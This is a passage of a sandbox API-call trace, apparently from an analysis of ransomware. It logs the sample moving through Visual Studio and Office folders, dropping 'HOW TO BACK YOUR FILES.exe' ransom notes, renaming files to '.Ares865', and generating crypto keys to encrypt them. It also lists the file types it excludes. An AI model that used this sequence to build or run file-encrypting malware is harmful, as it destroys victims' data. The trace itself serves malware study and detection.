8\\common7\\ide\\publicassemblies\\system.addin.dll.ares865"), dwFlags=0x1) returned 1 [0128.865] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PublicAssemblies\\System.AddIn.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\publicassemblies\\system.addin.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=38744) returned 1 [0128.865] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0128.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.866] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.867] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.867] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.867] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9a60, lpName=0x0) returned 0x170 [0128.868] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9a60) returned 0x190000 [0128.871] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.872] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.872] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0128.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0128.872] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.873] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0128.873] CloseHandle (hObject=0x170) returned 1 [0128.873] CloseHandle (hObject=0x118) returned 1 [0128.873] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0128.873] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.873] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.875] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56ab3000, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x61771db0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x56ab3000, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x9758, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System.AddIn.dll", cAlternateFileName="SYSTEM~1.DLL")) returned 0 [0128.875] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.875] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79b0 [0128.875] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies" [0128.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0128.875] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79a8 | out: hHeap=0x2b0000) returned 1 [0128.875] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies") returned 78 [0128.875] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies" | out: lpString1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies") returned="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies" [0128.875] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.875] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.876] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.877] GetLastError () returned 0x0 [0128.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0128.877] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0128.877] CloseHandle (hObject=0x120) returned 1 [0128.877] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0128.877] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.877] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5288c740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5288c740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.877] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.877] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.878] lstrcpyW (in: lpString1=0x2cce49e, lpString2="Microsoft.VisualStudio.Tools.Applications.Project.dll" | out: lpString1="Microsoft.VisualStudio.Tools.Applications.Project.dll") returned="Microsoft.VisualStudio.Tools.Applications.Project.dll" [0128.878] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Project.dll") returned 53 [0128.878] lstrlenW (lpString="Ares865") returned 7 [0128.878] lstrcmpiW (lpString1="ect.dll", lpString2="Ares865") returned 1 [0128.878] lstrlenW (lpString=".dll") returned 4 [0128.878] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Project.dll", lpString2=".dll") returned 1 [0128.878] lstrlenW (lpString=".lnk") returned 4 [0128.878] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Project.dll", lpString2=".lnk") returned 1 [0128.878] lstrlenW (lpString=".ini") returned 4 [0128.878] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Project.dll", lpString2=".ini") returned 1 [0128.878] lstrlenW (lpString=".sys") returned 4 [0128.878] lstrcmpiW (lpString1="Microsoft.VisualStudio.Tools.Applications.Project.dll", lpString2=".sys") returned 1 [0128.878] lstrlenW (lpString="Microsoft.VisualStudio.Tools.Applications.Project.dll") returned 53 [0128.878] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.Ares865") returned 140 [0128.878] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll.ares865"), dwFlags=0x1) returned 1 [0128.880] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Visual Studio 8\\Common7\\IDE\\PrivateAssemblies\\Microsoft.VisualStudio.Tools.Applications.Project.dll.Ares865" (normalized: "c:\\program files (x86)\\microsoft visual studio 8\\common7\\ide\\privateassemblies\\microsoft.visualstudio.tools.applications.project.dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0128.880] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=153504) returned 1 [0128.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0128.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0128.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0128.881] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0128.881] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0128.881] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.881] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x25aa0, lpName=0x0) returned 0x170 [0128.883] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x25aa0) returned 0x420000 [0128.896] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0128.897] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0128.897] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0128.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0128.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0128.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0128.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0128.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0128.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0128.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0128.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0128.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0128.897] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0128.897] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0128.899] CloseHandle (hObject=0x170) returned 1 [0128.899] CloseHandle (hObject=0x118) returned 1 [0128.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0128.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0128.899] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0128.900] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a3eb700, ftCreationTime.dwHighDateTime=0x1c9e43c, ftLastAccessTime.dwLowDateTime=0x61027a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5a3eb700, ftLastWriteTime.dwHighDateTime=0x1c9e43c, nFileSizeHigh=0x0, nFileSizeLow=0x257a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VisualStudio.Tools.Applications.Project.dll", cAlternateFileName="MICROS~1.DLL")) returned 0 [0128.900] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.900] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0128.900] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Office", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Office") returned="C:\\Program Files (x86)\\Microsoft Office" [0128.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8f8 | out: hHeap=0x2b0000) returned 1 [0128.900] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0128.900] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Office") returned 39 [0128.900] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Office" | out: lpString1="C:\\Program Files (x86)\\Microsoft Office") returned="C:\\Program Files (x86)\\Microsoft Office" [0128.900] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.900] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft office\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.901] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.902] GetLastError () returned 0x0 [0128.902] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0128.902] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0128.902] CloseHandle (hObject=0x120) returned 1 [0128.902] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0128.902] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.902] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528b28a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528b28a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.902] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.902] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.903] lstrcpyW (in: lpString1=0x2cce450, lpString2="Office14" | out: lpString1="Office14") returned="Office14" [0128.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0128.903] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2d2f60 [0128.903] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0128.903] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5076050, ftCreationTime.dwHighDateTime=0x1d505f8, ftLastAccessTime.dwLowDateTime=0xf771dd30, ftLastAccessTime.dwHighDateTime=0x1d5413e, ftLastWriteTime.dwLowDateTime=0xf771dd30, ftLastWriteTime.dwHighDateTime=0x1d5413e, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pale_natural.exe", cAlternateFileName="PALE_N~1.EXE")) returned 1 [0128.903] lstrcmpiW (lpString1="pale_natural.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0128.903] lstrcmpiW (lpString1="pale_natural.exe", lpString2="aoldtz.exe") returned 1 [0128.903] lstrcpyW (in: lpString1=0x2cce450, lpString2="pale_natural.exe" | out: lpString1="pale_natural.exe") returned="pale_natural.exe" [0128.903] lstrlenW (lpString="pale_natural.exe") returned 16 [0128.903] lstrlenW (lpString="Ares865") returned 7 [0128.903] lstrcmpiW (lpString1="ral.exe", lpString2="Ares865") returned 1 [0128.903] lstrlenW (lpString=".dll") returned 4 [0128.903] lstrcmpiW (lpString1="pale_natural.exe", lpString2=".dll") returned 1 [0128.903] lstrlenW (lpString=".lnk") returned 4 [0128.903] lstrcmpiW (lpString1="pale_natural.exe", lpString2=".lnk") returned 1 [0128.903] lstrlenW (lpString=".ini") returned 4 [0128.903] lstrcmpiW (lpString1="pale_natural.exe", lpString2=".ini") returned 1 [0128.903] lstrlenW (lpString=".sys") returned 4 [0128.903] lstrcmpiW (lpString1="pale_natural.exe", lpString2=".sys") returned 1 [0128.903] lstrlenW (lpString="pale_natural.exe") returned 16 [0128.904] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe.Ares865") returned 64 [0128.904] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe" (normalized: "c:\\program files (x86)\\microsoft office\\pale_natural.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\pale_natural.exe.ares865"), dwFlags=0x1) returned 1 [0128.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\pale_natural.exe.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0xffffffff [0128.905] GetLastError () returned 0x20 [0128.905] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S CreateFile error %i\r\n" | out: param_1="[ERROR] C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe CreateFile error 32\r\n") returned 86 [0128.906] lstrlenA (lpString="[ERROR] C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe CreateFile error 32\r\n") returned 86 [0128.906] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0128.906] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xa685 [0128.906] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x56, lpOverlapped=0x0) returned 1 [0128.907] CloseHandle (hObject=0x118) returned 1 [0128.907] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe.Ares865" (normalized: "c:\\program files (x86)\\microsoft office\\pale_natural.exe.ares865"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\pale_natural.exe" (normalized: "c:\\program files (x86)\\microsoft office\\pale_natural.exe"), dwFlags=0x1) returned 1 [0128.907] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0128.907] CloseHandle (hObject=0x0) returned 0 [0128.907] CloseHandle (hObject=0xffffffff) returned 0 [0128.907] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5076050, ftCreationTime.dwHighDateTime=0x1d505f8, ftLastAccessTime.dwLowDateTime=0xf771dd30, ftLastAccessTime.dwHighDateTime=0x1d5413e, ftLastWriteTime.dwLowDateTime=0xf771dd30, ftLastWriteTime.dwHighDateTime=0x1d5413e, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pale_natural.exe", cAlternateFileName="PALE_N~1.EXE")) returned 0 [0128.907] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0128.908] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0128.908] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Microsoft Office\\Office14", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Microsoft Office\\Office14") returned="C:\\Program Files (x86)\\Microsoft Office\\Office14" [0128.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f60 | out: hHeap=0x2b0000) returned 1 [0128.908] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7988 | out: hHeap=0x2b0000) returned 1 [0128.908] lstrlenW (lpString="C:\\Program Files (x86)\\Microsoft Office\\Office14") returned 48 [0128.908] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Microsoft Office\\Office14" | out: lpString1="C:\\Program Files (x86)\\Microsoft Office\\Office14") returned="C:\\Program Files (x86)\\Microsoft Office\\Office14" [0128.908] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0128.908] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\how to back your files.exe"), bFailIfExists=1) returned 0 [0128.908] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0128.909] GetLastError () returned 0x0 [0128.909] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33cfb0 [0128.909] ReadFile (in: hFile=0x120, lpBuffer=0x33cfb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33cfb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0128.909] CloseHandle (hObject=0x120) returned 1 [0128.909] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33cfb0 | out: hHeap=0x2b0000) returned 1 [0128.909] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0128.909] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office14\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xef0a44f0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x528b28a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x528b28a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0128.909] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0128.909] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0128.910] lstrcpyW (in: lpString1=0x2cce462, lpString2="1033" | out: lpString1="1033") returned="1033" [0128.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0128.910] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6c) returned 0x2e4710 [0128.910] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0128.910] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fd50800, ftCreationTime.dwHighDateTime=0x1ca9120, ftLastAccessTime.dwLowDateTime=0x219f7cf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x9fd50800, ftLastWriteTime.dwHighDateTime=0x1ca9120, nFileSizeHigh=0x0, 